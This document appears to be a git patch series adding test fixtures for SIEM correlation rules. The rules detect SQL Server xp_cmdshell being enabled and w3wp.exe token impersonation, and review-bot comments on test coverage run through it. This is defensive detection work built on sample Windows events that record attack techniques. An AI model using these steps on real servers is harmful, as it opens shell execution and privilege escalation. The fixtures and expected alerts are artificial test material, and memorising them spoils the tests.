+# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.key": "msedgewin10|xp_cmdshell", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Server Software Component: SQL Stored Procedures", "correlation_name": "XP_Cmdshell_Enable", "correlation_type": "event", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Enable|msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "status": "success", "subject": "account"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc new file mode 100644 index 00000000..5824c8bc --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc 
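Review bot: The 15457 fixture carries no principal — `subject` is `account` but there is no `subject.account.name`, and the `Binary` blob decodes (UTF-16LE) to the host name `MSEDGEWIN10` and the database name `master` only — so the alert is keyed on `msedgewin10|xp_cmdshell` and cannot say who enabled the procedure. That is a property of the event rather than of the test, but it should be written down where an analyst will look: replace the placeholder `# Тут будет твой тест. …` with e.g. `# MSSQL 15457 'xp_cmdshell' 0->1: expect one XP_Cmdshell_Enable alert keyed host|parameter; the event has no login, attribution needs another source such as SQL Server Audit`. The expect pins `reason: parameter enabled` together with `object.value: xp_cmdshell`, which is the right pair to lock in.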
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1430643Z\"},\"EventRecordID\":\"9691\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"show advanced options\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "show advanced options", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:14:13.158Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.143Z", "type": "raw", "uuid": "f410f722-fa48-492a-bcb9-f6c57a09dfdf"} +{"action": "modify", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1586215Z\"},\"EventRecordID\":\"9692\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"xp_cmdshell\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:14:13.159Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.158Z", "type": "raw", "uuid": "016623b1-bda5-4f2c-8fba-baaaa3b80ecb"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "previously show advanced options was enabled", "alert.key": "msedgewin10|xp_cmdshell", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Server Software Component: SQL Stored Procedures", "correlation_name": "XP_Cmdshell_Enable", "correlation_type": "event", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Enable|msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "status": "success", "subject": "account"} From 676676e04182a828de64d5fa87a4e2d81e9f3c3f Mon Sep 17 00:00:00 2001 
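Review bot: Neither test feeds a 15457 whose new value is `0`, so the rule is never shown to stay silent when xp_cmdshell is disabled (`Data: ["xp_cmdshell","1","0"]`); if the match rests on `reason: parameter enabled` or on the `"1"` value, a regression that matches on `object.value` alone would still pass both files. Add a test_3 with that event and no expected correlation. The precursor enrichment this case pins (`alert.context: previously show advanced options was enabled`) depends on a lookback window that the fixture exercises only with a 15 ms gap between the two events; state the window the rule uses in the comment that replaces the `# Тут будет твой тест. …` placeholder, e.g. `# 'show advanced options' then 'xp_cmdshell' enabled 15 ms apart: expect one alert enriched with alert.context`, so the test does not go stale if the window is tightened.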
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Wed, 2 Aug 2023 10:21:03 +0300
Subject: [PATCH 47/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?=
 =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?=
 =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?=
 =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(=20Creat?=
 =?UTF-8?q?eProcessAsUser=5FImpersonation)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../CreateProcessAsUser_Impersonation/tests/test_1.sc | 5 +++++
 .../CreateProcessAsUser_Impersonation/tests/test_2.sc | 5 +++++
 2 files changed, 10 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc

diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc
new file mode 100644
index 00000000..c9f15927
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc
@@ -0,0 +1,5 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9871239Z\"},\"EventRecordID\":\"161473\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x22afa1\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Advapi\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},{\"Name\":\"WorkstationName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboun
dUserName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "chain_id": "c5412e82-8bc5-0000-0a2f-41c5c58bd601", "datafield6": "Network", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "msedgewin10", "dst.hostname": "msedgewin10", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.773Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", 
"task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "829ce377-a5ed-431e-b00b-142f8a299ee5"} +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4648\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9870522Z\"},\"EventRecordID\":\"161472\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetServerName\",\"text\":\"localhost\"},{\"Name\":\"TargetInfo\",\"text\":\"localhost\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield6": "00000000-0000-0000-0000-000000000000", "datafield8": "00000000-0000-0000-0000-000000000000", "dst.host": "localhost", "dst.hostname": 
"localhost", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4648_A_logon_was_attempted_using_explicit_credentials", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4648", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.name": "ieuser", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.776Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "1a7d57e9-6488-4c0d-aca8-b2ac3e619852"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "elevate", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Token Impersonation/Theft", "correlation_name": "CreateProcessAsUser_Impersonation", "correlation_type": "incident", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhost", "dst.hostname": "localhost", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "CreateProcessAsUser_Impersonation|msedgewin10|svc01|5132|ieuser", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc new file mode 100644 index 00000000..7ff4848d --- /dev/null 
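Review bot: The `# Тут будет твой тест. В секции expect ...` line is the generator's placeholder, not a description of this fixture, and it is committed unchanged here, in test_2.sc of this patch and in Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc. Replace it with one line that states the scenario, e.g. `# 4624 logon type 3 via Advapi from w3wp.exe (svc01 -> ieuser) with ElevatedToken, paired with 4648 to localhost; one incident expected`. Without it a maintainer can only tell test_1 and test_2 apart by diffing two very long event lines.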
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc 
@@ -0,0 +1,5 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9871239Z\"},\"EventRecordID\":\"161473\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"localhist\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x22afa1\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Advapi\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},{\"Name\":\"WorkstationName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboundU
serName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "chain_id": "c5412e82-8bc5-0000-0a2f-41c5c58bd601", "datafield6": "Network", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.773Z", "src.host": "msedgewin10", "src.hostname": "msedgewin10", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": 
"c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "829ce377-a5ed-431e-b00b-142f8a299ee5"} +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4648\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9870522Z\"},\"EventRecordID\":\"161472\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"localhist\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetServerName\",\"text\":\"localhist\"},{\"Name\":\"TargetInfo\",\"text\":\"localhist\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield6": "00000000-0000-0000-0000-000000000000", "datafield8": 
"00000000-0000-0000-0000-000000000000", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4648_A_logon_was_attempted_using_explicit_credentials", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4648", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.name": "ieuser", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.776Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "1a7d57e9-6488-4c0d-aca8-b2ac3e619852"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "elevate", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Token Impersonation/Theft", "correlation_name": "CreateProcessAsUser_Impersonation", "correlation_type": "incident", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "CreateProcessAsUser_Impersonation|localhist|svc01|5132|ieuser", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\"} From 59a4d1e1975f7046a5505e8cb222e27db53b97ce Mon Sep 17 00:00:00 2001 
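Review bot: Every host field in this fixture (Computer, TargetServerName, TargetInfo, dst.host, the event_src.* fields and the aggregation key) is `localhist`, which reads as a typo of `localhost` rather than a deliberate variant, so the difference from test_1.sc (TargetServerName literally `localhost`, computer `MSEDGEWIN10`) is not self-evident. If the intent is to cover the case where the 4648's TargetServerName equals the machine's own name, use an obviously distinct hostname and say so in the comment line, e.g. `# variant: TargetServerName equals the local computer name instead of "localhost"`. Both fixtures in this patch are positive cases expecting one incident; a negative case (the same pair with ElevatedToken `%%1843` or a logon type other than 3, expecting 0) would show the rule does not fire on any 4624/4648 pair, assuming those are the fields it keys on.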
